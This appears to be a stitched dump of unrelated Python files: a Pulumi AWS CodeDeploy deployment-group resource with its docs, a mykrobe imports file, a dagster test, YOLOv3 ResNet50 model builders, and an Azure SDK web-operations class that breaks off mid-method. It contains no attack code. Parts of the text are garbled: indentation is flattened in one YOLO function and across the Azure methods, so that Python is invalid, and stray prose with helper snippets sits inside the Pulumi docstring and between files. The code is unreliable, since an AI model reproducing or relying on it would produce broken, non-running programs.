* `action` (`pulumi.Input[str]`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminateBlueInstancesOnDeploymentSuccess` (`pulumi.Input[dict]`) - Information about whether to terminate instances in the original fleet during a blue/green deployment (documented below).
* `action` (`pulumi.Input[str]`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminationWaitTimeInMinutes` (`pulumi.Input[float]`) - The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
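The combination of `actionOnTimeout` and `waitTimeInMinutes` above decides what happens once the replacement fleet is ready; a minimal decision helper makes the behavior concrete (a hypothetical illustration, not provider code — only the `Stopped` status name comes from the docs, the others are placeholders):

```python
def deployment_status_after_wait(action_on_timeout, rerouted_manually,
                                 minutes_elapsed, wait_time_in_minutes=0):
    """Resolve a blue/green deployment's status once instances are ready.

    CONTINUE_DEPLOYMENT reroutes traffic immediately; STOP_DEPLOYMENT waits
    for a manual reroute and flips the status to Stopped when the wait expires.
    """
    if action_on_timeout == "CONTINUE_DEPLOYMENT":
        return "Succeeded"
    if action_on_timeout == "STOP_DEPLOYMENT":
        if rerouted_manually:
            return "Succeeded"
        if minutes_elapsed >= wait_time_in_minutes:
            return "Stopped"
        return "InProgress"
    raise ValueError("unknown actionOnTimeout: %r" % action_on_timeout)
```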
The **deployment_style** object supports the following:
* `deploymentOption` (`pulumi.Input[str]`) - Indicates whether to route deployment traffic behind a load balancer. Valid Values are `WITH_TRAFFIC_CONTROL` or `WITHOUT_TRAFFIC_CONTROL`.
* `deploymentType` (`pulumi.Input[str]`) - Indicates whether to run an in-place deployment or a blue/green deployment. Valid Values are `IN_PLACE` or `BLUE_GREEN`.
The **ec2_tag_filters** object supports the following:
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
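The three filter `type` values above differ only in which half of the tag they compare; a small matcher shows the distinction (a hypothetical helper for illustration, not part of the provider):

```python
def tag_filter_matches(instance_tags, key=None, value=None, filter_type="KEY_AND_VALUE"):
    """Check a single EC2 tag filter against an instance's tag dictionary."""
    if filter_type == "KEY_ONLY":
        return key in instance_tags                 # any value is acceptable
    if filter_type == "VALUE_ONLY":
        return value in instance_tags.values()      # any key is acceptable
    if filter_type == "KEY_AND_VALUE":
        return instance_tags.get(key) == value      # both must line up
    raise ValueError("unknown filter type: %r" % filter_type)
```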
The **ec2_tag_sets** object supports the following:
* `ec2_tag_filters` (`pulumi.Input[list]`) - Tag filters associated with the deployment group. See the AWS docs for details.
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **ecs_service** object supports the following:
* `clusterName` (`pulumi.Input[str]`) - The name of the ECS cluster.
* `serviceName` (`pulumi.Input[str]`) - The name of the ECS service.
The **load_balancer_info** object supports the following:
* `elbInfos` (`pulumi.Input[list]`) - The Classic Elastic Load Balancer to use in a deployment. Conflicts with `target_group_info` and `target_group_pair_info`.
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `targetGroupInfos` (`pulumi.Input[list]`) - The (Application/Network Load Balancer) target group to use in a deployment. Conflicts with `elb_info` and `target_group_pair_info`.
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `targetGroupPairInfo` (`pulumi.Input[dict]`) - The (Application/Network Load Balancer) target group pair to use in a deployment. Conflicts with `elb_info` and `target_group_info`.
* `prodTrafficRoute` (`pulumi.Input[dict]`) - Configuration block for the production traffic route (documented below).
* `listenerArns` (`pulumi.Input[list]`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
* `targetGroups` (`pulumi.Input[list]`) - Configuration blocks for a target group within a target group pair (documented below).
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `testTrafficRoute` (`pulumi.Input[dict]`) - Configuration block for the test traffic route (documented below).
* `listenerArns` (`pulumi.Input[list]`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
The **on_premises_instance_tag_filters** object supports the following:
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **trigger_configurations** object supports the following:
* `triggerEvents` (`pulumi.Input[list]`) - The event type or types for which notifications are triggered. Some values that are supported: `DeploymentStart`, `DeploymentSuccess`, `DeploymentFailure`, `DeploymentStop`, `DeploymentRollback`, `InstanceStart`, `InstanceSuccess`, `InstanceFailure`. See [the CodeDeploy documentation][1] for all possible values.
* `triggerName` (`pulumi.Input[str]`) - The name of the notification trigger.
* `triggerTargetArn` (`pulumi.Input[str]`) - The ARN of the SNS topic through which notifications are sent.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/codedeploy_deployment_group.html.markdown.
"""
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = dict()

            __props__['alarm_configuration'] = alarm_configuration
            if app_name is None:
                raise TypeError("Missing required property 'app_name'")
            __props__['app_name'] = app_name
            __props__['auto_rollback_configuration'] = auto_rollback_configuration
            __props__['autoscaling_groups'] = autoscaling_groups
            __props__['blue_green_deployment_config'] = blue_green_deployment_config
            __props__['deployment_config_name'] = deployment_config_name
            if deployment_group_name is None:
                raise TypeError("Missing required property 'deployment_group_name'")
            __props__['deployment_group_name'] = deployment_group_name
            __props__['deployment_style'] = deployment_style
            __props__['ec2_tag_filters'] = ec2_tag_filters
            __props__['ec2_tag_sets'] = ec2_tag_sets
            __props__['ecs_service'] = ecs_service
            __props__['load_balancer_info'] = load_balancer_info
            __props__['on_premises_instance_tag_filters'] = on_premises_instance_tag_filters
            if service_role_arn is None:
                raise TypeError("Missing required property 'service_role_arn'")
            __props__['service_role_arn'] = service_role_arn
            __props__['trigger_configurations'] = trigger_configurations
        super(DeploymentGroup, __self__).__init__(
            'aws:codedeploy/deploymentGroup:DeploymentGroup',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name, id, opts=None, alarm_configuration=None, app_name=None, auto_rollback_configuration=None, autoscaling_groups=None, blue_green_deployment_config=None, deployment_config_name=None, deployment_group_name=None, deployment_style=None, ec2_tag_filters=None, ec2_tag_sets=None, ecs_service=None, load_balancer_info=None, on_premises_instance_tag_filters=None, service_role_arn=None, trigger_configurations=None):
"""
Get an existing DeploymentGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] alarm_configuration: Configuration block of alarms associated with the deployment group (documented below).
:param pulumi.Input[str] app_name: The name of the application.
:param pulumi.Input[dict] auto_rollback_configuration: Configuration block of the automatic rollback configuration associated with the deployment group (documented below).
:param pulumi.Input[list] autoscaling_groups: Autoscaling groups associated with the deployment group.
:param pulumi.Input[dict] blue_green_deployment_config: Configuration block of the blue/green deployment options for a deployment group (documented below).
:param pulumi.Input[str] deployment_config_name: The name of the group's deployment config. The default is "CodeDeployDefault.OneAtATime".
:param pulumi.Input[str] deployment_group_name: The name of the deployment group.
:param pulumi.Input[dict] deployment_style: Configuration block of the type of deployment, either in-place or blue/green, you want to run and whether to route deployment traffic behind a load balancer (documented below).
:param pulumi.Input[list] ec2_tag_filters: Tag filters associated with the deployment group. See the AWS docs for details.
:param pulumi.Input[list] ec2_tag_sets: Configuration block(s) of Tag filters associated with the deployment group, which are also referred to as tag groups (documented below). See the AWS docs for details.
:param pulumi.Input[dict] ecs_service: Configuration block(s) of the ECS services for a deployment group (documented below).
:param pulumi.Input[dict] load_balancer_info: Single configuration block of the load balancer to use in a blue/green deployment (documented below).
:param pulumi.Input[list] on_premises_instance_tag_filters: On-premises tag filters associated with the group. See the AWS docs for details.
:param pulumi.Input[str] service_role_arn: The service role ARN that allows deployments.
:param pulumi.Input[list] trigger_configurations: Configuration block(s) of the triggers for the deployment group (documented below).
The **alarm_configuration** object supports the following:
* `alarms` (`pulumi.Input[list]`) - A list of alarms configured for the deployment group. _A maximum of 10 alarms can be added to a deployment group_.
* `enabled` (`pulumi.Input[bool]`) - Indicates whether the alarm configuration is enabled for this deployment group.
* `ignorePollAlarmFailure` (`pulumi.Input[bool]`) - Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from CloudWatch. The default value is `false`.
* `true`: The deployment will proceed even if alarm status information can't be retrieved.
* `false`: The deployment will stop if alarm status information can't be retrieved.
The **auto_rollback_configuration** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `events` (`pulumi.Input[list]`) - The event type or types that trigger a rollback. Supported types are `DEPLOYMENT_FAILURE` and `DEPLOYMENT_STOP_ON_ALARM`.
The **blue_green_deployment_config** object supports the following:
* `deploymentReadyOption` (`pulumi.Input[dict]`) - Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment (documented below).
* `actionOnTimeout` (`pulumi.Input[str]`) - When to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
* `CONTINUE_DEPLOYMENT`: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
* `STOP_DEPLOYMENT`: Do not register new instances with the load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
* `waitTimeInMinutes` (`pulumi.Input[float]`) - The number of minutes to wait before the status of a blue/green deployment is changed to Stopped if rerouting is not started manually. Applies only to the `STOP_DEPLOYMENT` option for `action_on_timeout`.
* `greenFleetProvisioningOption` (`pulumi.Input[dict]`) - Information about how instances are provisioned for a replacement environment in a blue/green deployment (documented below).
* `action` (`pulumi.Input[str]`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminateBlueInstancesOnDeploymentSuccess` (`pulumi.Input[dict]`) - Information about whether to terminate instances in the original fleet during a blue/green deployment (documented below).
* `action` (`pulumi.Input[str]`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminationWaitTimeInMinutes` (`pulumi.Input[float]`) - The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
The **deployment_style** object supports the following:
* `deploymentOption` (`pulumi.Input[str]`) - Indicates whether to route deployment traffic behind a load balancer. Valid Values are `WITH_TRAFFIC_CONTROL` or `WITHOUT_TRAFFIC_CONTROL`.
* `deploymentType` (`pulumi.Input[str]`) - Indicates whether to run an in-place deployment or a blue/green deployment. Valid Values are `IN_PLACE` or `BLUE_GREEN`.
The **ec2_tag_filters** object supports the following:
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **ec2_tag_sets** object supports the following:
* `ec2_tag_filters` (`pulumi.Input[list]`) - Tag filters associated with the deployment group. See the AWS docs for details.
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **ecs_service** object supports the following:
* `clusterName` (`pulumi.Input[str]`) - The name of the ECS cluster.
* `serviceName` (`pulumi.Input[str]`) - The name of the ECS service.
The **load_balancer_info** object supports the following:
* `elbInfos` (`pulumi.Input[list]`) - The Classic Elastic Load Balancer to use in a deployment. Conflicts with `target_group_info` and `target_group_pair_info`.
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `targetGroupInfos` (`pulumi.Input[list]`) - The (Application/Network Load Balancer) target group to use in a deployment. Conflicts with `elb_info` and `target_group_pair_info`.
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `targetGroupPairInfo` (`pulumi.Input[dict]`) - The (Application/Network Load Balancer) target group pair to use in a deployment. Conflicts with `elb_info` and `target_group_info`.
* `prodTrafficRoute` (`pulumi.Input[dict]`) - Configuration block for the production traffic route (documented below).
* `listenerArns` (`pulumi.Input[list]`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
* `targetGroups` (`pulumi.Input[list]`) - Configuration blocks for a target group within a target group pair (documented below).
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `testTrafficRoute` (`pulumi.Input[dict]`) - Configuration block for the test traffic route (documented below).
* `listenerArns` (`pulumi.Input[list]`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
The **on_premises_instance_tag_filters** object supports the following:
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **trigger_configurations** object supports the following:
* `triggerEvents` (`pulumi.Input[list]`) - The event type or types for which notifications are triggered. Some values that are supported: `DeploymentStart`, `DeploymentSuccess`, `DeploymentFailure`, `DeploymentStop`, `DeploymentRollback`, `InstanceStart`, `InstanceSuccess`, `InstanceFailure`. See [the CodeDeploy documentation][1] for all possible values.
* `triggerName` (`pulumi.Input[str]`) - The name of the notification trigger.
* `triggerTargetArn` (`pulumi.Input[str]`) - The ARN of the SNS topic through which notifications are sent.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/codedeploy_deployment_group.html.markdown.
"""
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = dict()

        __props__["alarm_configuration"] = alarm_configuration
        __props__["app_name"] = app_name
        __props__["auto_rollback_configuration"] = auto_rollback_configuration
        __props__["autoscaling_groups"] = autoscaling_groups
        __props__["blue_green_deployment_config"] = blue_green_deployment_config
        __props__["deployment_config_name"] = deployment_config_name
        __props__["deployment_group_name"] = deployment_group_name
        __props__["deployment_style"] = deployment_style
        __props__["ec2_tag_filters"] = ec2_tag_filters
        __props__["ec2_tag_sets"] = ec2_tag_sets
        __props__["ecs_service"] = ecs_service
        __props__["load_balancer_info"] = load_balancer_info
        __props__["on_premises_instance_tag_filters"] = on_premises_instance_tag_filters
        __props__["service_role_arn"] = service_role_arn
        __props__["trigger_configurations"] = trigger_configurations
        return DeploymentGroup(resource_name, opts=opts, __props__=__props__)

    def translate_output_property(self, prop):
        return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

    def translate_input_property(self, prop):
        return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
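The two translate hooks above fall back to the property name itself when the generated lookup tables miss. For simple names, what those tables encode is a plain camelCase/snake_case conversion, which can be sketched without the tables (hypothetical helpers, not the provider's actual implementation):

```python
import re

def camel_to_snake(name):
    """blueGreenDeploymentConfig -> blue_green_deployment_config"""
    # Insert an underscore before every upper-case letter, then lower-case.
    return re.sub(r"(?<!^)(?=[A-Z])", "_", name).lower()

def snake_to_camel(name):
    """blue_green_deployment_config -> blueGreenDeploymentConfig"""
    first, *rest = name.split("_")
    return first + "".join(part.title() for part in rest)
```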
# File: src/mykrobe/variants/__init__.py (repo: chamilaadikaram/mykrobe, license: MIT)
from mykrobe.variants.schema.models import VariantCallSet
from mykrobe.variants.schema.models import CallSet
from mykrobe.variants.schema.models import Call
from mykrobe.variants.schema.models import VariantCall
from mykrobe.variants.schema.models import SequenceCall
from mykrobe.variants.schema.models import Variant
from mykrobe.variants.schema.models import VariantSet
from mykrobe.variants.schema.models import VariantSetMetadata
from mykrobe.variants.schema.models import Reference
from mykrobe.variants.schema.models import ReferenceSet

# File: examples/docs_snippets/docs_snippets_tests/getting_started_tests/test_hello_world.py (repo: dbatten5/dagster, license: Apache-2.0)
from dagster import execute_pipeline
from docs_snippets.getting_started.hello_world import hello_pipeline
def test_hello_pipeline():
    assert execute_pipeline(hello_pipeline).success
# File: yolo3/models/yolo3_resnet50.py (repo: holajoa/keras-YOLOv3-model-set, license: MIT)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v3 ResNet50 Model Defined in Keras."""
from tensorflow.keras.layers import UpSampling2D, Concatenate
from tensorflow.keras.models import Model
from tensorflow.keras.applications.resnet import ResNet50
from yolo3.models.layers import yolo3_predictions, yolo3lite_predictions, tiny_yolo3_predictions, tiny_yolo3lite_predictions
def yolo3_resnet50_body(inputs, num_anchors, num_classes):
"""Create YOLO_V3 ResNet50 model CNN body in Keras."""
resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
print('backbone layers number: {}'.format(len(resnet50.layers)))
# input: 416 x 416 x 3
# conv5_block3_out: 13 x 13 x 2048
# conv4_block6_out: 26 x 26 x 1024
# conv3_block4_out: 52 x 52 x 512
# f1 :13 x 13 x 2048
f1 = resnet50.get_layer('conv5_block3_out').output
# f2: 26 x 26 x 1024
f2 = resnet50.get_layer('conv4_block6_out').output
# f3 : 52 x 52 x 512
f3 = resnet50.get_layer('conv3_block4_out').output
f1_channel_num = 1024
f2_channel_num = 512
f3_channel_num = 256
y1, y2, y3 = yolo3_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs = inputs, outputs=[y1,y2,y3])
def yolo3lite_resnet50_body(inputs, num_anchors, num_classes):
    '''Create YOLO_v3 Lite ResNet50 model CNN body in keras.'''
    resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
    print('backbone layers number: {}'.format(len(resnet50.layers)))

    # input: 416 x 416 x 3
    # conv5_block3_out: 13 x 13 x 2048
    # conv4_block6_out: 26 x 26 x 1024
    # conv3_block4_out: 52 x 52 x 512

    # f1: 13 x 13 x 2048
    f1 = resnet50.get_layer('conv5_block3_out').output
    # f2: 26 x 26 x 1024
    f2 = resnet50.get_layer('conv4_block6_out').output
    # f3: 52 x 52 x 512
    f3 = resnet50.get_layer('conv3_block4_out').output

    f1_channel_num = 1024
    f2_channel_num = 512
    f3_channel_num = 256

    y1, y2, y3 = yolo3lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)

    return Model(inputs=inputs, outputs=[y1, y2, y3])
def yolo3lite_spp_resnet50_body(inputs, num_anchors, num_classes):
    '''Create YOLO_v3 Lite SPP ResNet50 model CNN body in keras.'''
    resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
    print('backbone layers number: {}'.format(len(resnet50.layers)))

    # input: 416 x 416 x 3
    # conv5_block3_out: 13 x 13 x 2048
    # conv4_block6_out: 26 x 26 x 1024
    # conv3_block4_out: 52 x 52 x 512

    # f1: 13 x 13 x 2048
    f1 = resnet50.get_layer('conv5_block3_out').output
    # f2: 26 x 26 x 1024
    f2 = resnet50.get_layer('conv4_block6_out').output
    # f3: 52 x 52 x 512
    f3 = resnet50.get_layer('conv3_block4_out').output

    f1_channel_num = 1024
    f2_channel_num = 512
    f3_channel_num = 256

    y1, y2, y3 = yolo3lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes, use_spp=True)

    return Model(inputs=inputs, outputs=[y1, y2, y3])
def tiny_yolo3_resnet50_body(inputs, num_anchors, num_classes):
    '''Create Tiny YOLO_v3 ResNet50 model CNN body in keras.'''
    resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
    print('backbone layers number: {}'.format(len(resnet50.layers)))

    # input: 416 x 416 x 3
    # conv5_block3_out: 13 x 13 x 2048
    # conv4_block6_out: 26 x 26 x 1024
    # conv3_block4_out: 52 x 52 x 512

    # f1: 13 x 13 x 2048
    f1 = resnet50.get_layer('conv5_block3_out').output
    # f2: 26 x 26 x 1024
    f2 = resnet50.get_layer('conv4_block6_out').output

    f1_channel_num = 1024
    f2_channel_num = 512

    y1, y2 = tiny_yolo3_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes)

    return Model(inputs, [y1, y2])
def tiny_yolo3lite_resnet50_body(inputs, num_anchors, num_classes):
    '''Create Tiny YOLO_v3 Lite ResNet50 model CNN body in keras.'''
    resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
    print('backbone layers number: {}'.format(len(resnet50.layers)))

    # input: 416 x 416 x 3
    # conv5_block3_out: 13 x 13 x 2048
    # conv4_block6_out: 26 x 26 x 1024
    # conv3_block4_out: 52 x 52 x 512

    # f1: 13 x 13 x 2048
    f1 = resnet50.get_layer('conv5_block3_out').output
    # f2: 26 x 26 x 1024
    f2 = resnet50.get_layer('conv4_block6_out').output

    f1_channel_num = 1024
    f2_channel_num = 512

    y1, y2 = tiny_yolo3lite_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes)

    return Model(inputs, [y1, y2])
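All five builders above tap ResNet50 at strides 32, 16 and 8, which is where the 13/26/52 grid sizes in the comments come from for a 416 input. A quick sanity check of that arithmetic (a standalone helper, not part of the model code):

```python
def yolo3_grid_sizes(input_size, strides=(32, 16, 8)):
    """Grid sizes of the three YOLOv3 heads for a square input image."""
    if input_size % 32 != 0:
        raise ValueError("YOLOv3 input size must be a multiple of 32")
    return tuple(input_size // s for s in strides)
```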
# File: azure-mgmt-web/azure/mgmt/web/operations/global_model_operations.py (repo: HydAu/AzureSDKForPython, license: Apache-2.0)
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
import uuid
from .. import models
class GlobalModelOperations(object):
"""GlobalModelOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer

        self.config = config
    def get_subscription_publishing_credentials(
            self, custom_headers=None, raw=False, **operation_config):
        """
        Gets publishing credentials for the subscription owner

        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :rtype: :class:`User <azure.mgmt.web.models.User>`
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        """
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/publishingCredentials'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('User', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
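# Hypothetical usage sketch (the client attribute name `global_model`, the
# `WebSiteManagementClient` wiring, and the `publishing_user_name` attribute
# are assumptions, not taken from this file): fetch the subscription-level
# publishing credentials and read the deserialized User model.
#
#   client = WebSiteManagementClient(credentials, subscription_id)
#   user = client.global_model.get_subscription_publishing_credentials()
#   publishing_user = user.publishing_user_name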
def update_subscription_publishing_credentials(
self, request_message, custom_headers=None, raw=False, **operation_config):
"""
Updates publishing credentials for the subscription owner
:param request_message: requestMessage with new publishing credentials
:type request_message: :class:`User <azure.mgmt.web.models.User>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`User <azure.mgmt.web.models.User>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/publishingCredentials'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(request_message, 'User')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('User', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_subscription_geo_regions(
self, sku=None, custom_headers=None, raw=False, **operation_config):
"""
Gets list of available geo regions
:param sku: Filter only to regions that support this sku
:type sku: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`GeoRegionCollection
<azure.mgmt.web.models.GeoRegionCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/geoRegions'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if sku is not None:
query_parameters['sku'] = self._serialize.query("sku", sku, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GeoRegionCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_certificates(
self, custom_headers=None, raw=False, **operation_config):
"""
Get all certificates for a subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateCollection
<azure.mgmt.web.models.CertificateCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/certificates'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
